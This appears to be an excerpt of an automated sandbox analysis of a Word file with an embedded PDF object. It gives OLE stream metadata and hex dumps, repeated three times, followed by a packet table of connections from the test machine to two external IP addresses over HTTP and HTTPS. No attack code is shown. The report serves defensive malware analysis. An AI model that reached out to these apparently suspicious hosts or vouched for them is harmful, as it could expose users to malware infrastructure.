                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:30959
                                                    Entropy:7.915983867366053
                                                    Base64 Encoded:True
                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:30959
                                                    Entropy:7.915983867366053
                                                    Base64 Encoded:True
                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Title:
                                                    Subject:
                                                    Author:91974
                                                    Keywords:
                                                    Template:Normal.dotm
                                                    Last Saved By:91974
                                                    Revion Number:18
                                                    Total Edit Time:5
                                                    Create Time:2023-11-10T01:33:00Z
                                                    Last Saved Time:2024-05-03T01:42:00Z
                                                    Number of Pages:1
                                                    Number of Words:34
                                                    Number of Characters:194
                                                    Creating Application:Microsoft Office Word
                                                    Security:0
                                                    Number of Lines:1
                                                    Number of Paragraphs:1
                                                    Thumbnail Scaling Desired:false
                                                    Company:Grizli777
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:12.0000
                                                    General
                                                    Stream Path:\x1CompObj
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:94
                                                    Entropy:4.345966460061678
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x1Ole
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:20
                                                    Entropy:0.8475846798245739
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    General
                                                    Stream Path:\x3ObjInfo
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:6
                                                    Entropy:1.2516291673878228
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . .
                                                    Data Raw:00 00 03 00 01 00
                                                    General
                                                    Stream Path:CONTENTS
                                                    CLSID:
                                                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                                                    Stream Size:30959
                                                    Entropy:7.915983867366053
                                                    Base64 Encoded:True
                                                    Data ASCII:% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R | ( ( " * " < 6 ] . . { n n | . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
                                                    Data Raw:25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 6, 2024 14:59:04.166002035 CEST4916180192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:04.384645939 CEST8049161109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:04.384788036 CEST4916180192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:04.385014057 CEST4916180192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:04.600790977 CEST8049161109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:04.601027966 CEST8049161109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:04.601098061 CEST4916180192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.370537996 CEST4916280192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.590492964 CEST8049162109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:05.590585947 CEST4916280192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.596797943 CEST4916280192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.815851927 CEST8049162109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:05.815908909 CEST8049162109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:05.818574905 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.818613052 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:05.818730116 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.820529938 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:05.820544004 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.025947094 CEST4916280192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.267304897 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.267406940 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.276396036 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.276417017 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.276760101 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.362309933 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.404117107 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.706301928 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.706370115 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.706445932 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.706536055 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.706552029 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:06.706594944 CEST49163443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:06.706602097 CEST44349163109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:09.605103970 CEST8049161109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:09.605222940 CEST4916180192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.524419069 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.743269920 CEST8049164109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:10.743386984 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.745825052 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.820394039 CEST8049162109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:10.820472002 CEST4916280192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.820535898 CEST4916280192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.964458942 CEST8049164109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:10.964819908 CEST8049164109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:10.965337992 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.965379953 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:10.965447903 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.966149092 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:10.966161966 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.039453030 CEST8049162109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.173960924 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:11.408687115 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.408759117 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:11.412600040 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:11.412609100 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.412949085 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.426492929 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:11.472116947 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.859354019 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.859431028 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:11.859574080 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:11.859726906 CEST49165443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:11.859745026 CEST44349165109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.016588926 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.241651058 CEST8049164109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.437585115 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.502012014 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.502053976 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.502118111 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.502389908 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.502402067 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.942783117 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.942950964 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.949311018 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.949323893 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.949630976 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:12.950825930 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:12.992115021 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.386657000 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.386725903 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.386784077 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:13.390690088 CEST49166443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:13.390716076 CEST44349166109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.405797005 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:13.625000954 CEST8049164109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.625447989 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:13.625483990 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.625545979 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:13.625722885 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:13.625737906 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:13.826045036 CEST4916480192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.068173885 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.068547964 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.068571091 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.069124937 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.069129944 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.517391920 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.517462969 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.517507076 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.517739058 CEST49167443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.517762899 CEST44349167109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.556772947 CEST4916180192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.556982994 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.772608995 CEST8049161109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.775286913 CEST8049168109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.775362968 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.775495052 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:14.993872881 CEST8049168109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.993972063 CEST8049168109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:14.994079113 CEST4916880192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.008410931 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.008454084 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.008522987 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.009799957 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.009814024 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.452430964 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.452624083 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.456825972 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.456851006 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.457197905 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.457247972 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.466664076 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.512128115 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.901294947 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.901351929 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.901382923 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.901406050 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.901427031 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.901446104 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.902333021 CEST49169443192.168.2.22109.71.253.25
                                                    May 6, 2024 14:59:15.902365923 CEST44349169109.71.253.25192.168.2.22
                                                    May 6, 2024 14:59:15.916809082 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.079526901 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.079603910 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.079720974 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246083021 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246104002 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246114969 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246128082 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246143103 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246145010 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246157885 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246170998 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246182919 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246182919 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246182919 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246187925 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246195078 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246201038 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246213913 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.246216059 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246216059 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246239901 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.246248007 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.251705885 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.408902884 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408926964 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408941031 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408952951 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408961058 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.408967018 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408979893 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408988953 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.408992052 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.408992052 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409003019 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409017086 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409027100 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409027100 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409030914 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409044981 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409049034 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409058094 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409070015 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409076929 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409076929 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409090996 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409101009 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409105062 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409118891 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409125090 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409132004 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409143925 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409147024 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409154892 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409162045 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409173012 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409174919 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.409193993 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409193993 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409200907 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.409383059 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.571743011 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.571768045 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.571784019 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.571840048 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.571882010 CEST4917080192.168.2.22104.168.33.34
                                                    May 6, 2024 14:59:16.571896076 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.571911097 CEST8049170104.168.33.34192.168.2.22
                                                    May 6, 2024 14:59:16.571924925 CEST8049170104.168.33.34192.168.2.22
